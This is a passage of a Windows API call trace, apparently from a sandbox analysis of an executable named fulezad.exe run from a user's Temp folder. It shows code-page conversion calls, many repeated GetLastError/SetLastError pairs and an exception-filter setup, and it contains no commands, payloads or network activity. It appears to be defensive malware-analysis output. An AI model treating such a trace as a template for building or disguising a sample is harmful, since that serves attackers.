¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0084.941] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0084.941] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fcb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x9c\x5d\x2d\x06\xf4\xfe\x18", lpUsedDefaultChar=0x0) returned 256 [0084.941] GetLastError () returned 0x5 [0084.942] SetLastError (dwErrCode=0x5) [0084.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0084.942] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdb8, cbMultiByte=256, lpWideCharStr=0x18f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0084.942] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0084.942] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0084.942] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fbb8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x9c\x5d\x2d\x06\xf4\xfe\x18", lpUsedDefaultChar=0x0) returned 256 [0084.942] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4768e0, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fulezad.exe")) returned 0x30 [0084.942] GetLastError () returned 0x0 [0084.942] SetLastError (dwErrCode=0x0) [0084.942] GetLastError () returned 0x0 [0084.942] SetLastError (dwErrCode=0x0) [0084.942] GetLastError () returned 0x0 [0084.942] SetLastError (dwErrCode=0x0) [0084.942] GetLastError () returned 0x0 [0084.942] SetLastError (dwErrCode=0x0) [0084.942] GetLastError () returned 0x0 [0084.942] SetLastError (dwErrCode=0x0) [0084.942] GetLastError () returned 0x0 [0084.942] SetLastError (dwErrCode=0x0) [0084.942] GetLastError () returned 0x0 [0084.942] SetLastError (dwErrCode=0x0) [0084.942] GetLastError () returned 0x0 [0084.942] SetLastError (dwErrCode=0x0) [0084.942] GetLastError () returned 0x0 [0084.942] SetLastError (dwErrCode=0x0) [0084.942] GetLastError () returned 0x0 [0084.942] SetLastError (dwErrCode=0x0) [0084.942] GetLastError () returned 0x0 [0084.942] SetLastError (dwErrCode=0x0) [0084.942] GetLastError () returned 0x0 [0084.942] SetLastError (dwErrCode=0x0) [0084.942] GetLastError () returned 0x0 [0084.942] SetLastError (dwErrCode=0x0) [0084.942] GetLastError () returned 0x0 [0084.942] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.943] SetLastError (dwErrCode=0x0) [0084.943] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.944] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.944] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.944] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.944] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.944] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.944] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.944] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.944] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.944] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.944] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.944] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.944] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.944] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.944] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.944] GetLastError () returned 0x0 [0084.944] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.945] GetLastError () returned 0x0 [0084.945] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.946] SetLastError (dwErrCode=0x0) [0084.946] GetLastError () returned 0x0 [0084.947] SetLastError (dwErrCode=0x0) [0084.947] GetLastError () returned 0x0 [0084.947] SetLastError (dwErrCode=0x0) [0084.947] GetLastError () returned 0x0 [0084.947] SetLastError (dwErrCode=0x0) [0084.947] GetLastError () returned 0x0 [0084.947] SetLastError (dwErrCode=0x0) [0084.947] GetLastError () returned 0x0 [0084.947] SetLastError (dwErrCode=0x0) [0084.947] GetLastError () returned 0x0 [0084.947] SetLastError (dwErrCode=0x0) [0084.948] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0084.948] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40c6ab) returned 0x0 [0084.948] GetLastError () returned 0x0 [0084.948] SetLastError (dwErrCode=0x0) [0084.948] GetLastError () returned 0x0 [0084.948] SetLastError (dwErrCode=0x0) [0084.948] GetLastError () returned 0x0 [0084.948] SetLastError (dwErrCode=0x0) [0084.948] GetLastError () returned 0x0 [0084.948] SetLastError (dwErrCode=0x0) [0084.948] GetLastError () returned 0x0 [0084.948] SetLastError (dwErrCode=0x0) [0084.948] GetLastError () returned 0x0 [0084.948] SetLastError (dwErrCode=0x0) [0084.948] GetLastError () returned 0x0 [0084.948] SetLastError (dwErrCode=0x0) [0084.948] GetLastError () returned 0x0 [0084.948] SetLastError (dwErrCode=0x0) [0084.948] GetLastError () returned 0x0 [0084.948] SetLastError (dwErrCode=0x0) [0084.948] GetLastError () returned 0x0 [0084.948] SetLastError (dwErrCode=0x0) [0084.948] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.949] SetLastError (dwErrCode=0x0) [0084.949] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) [0084.950] GetLastError () returned 0x0 [0084.950] SetLastError (dwErrCode=0x0) 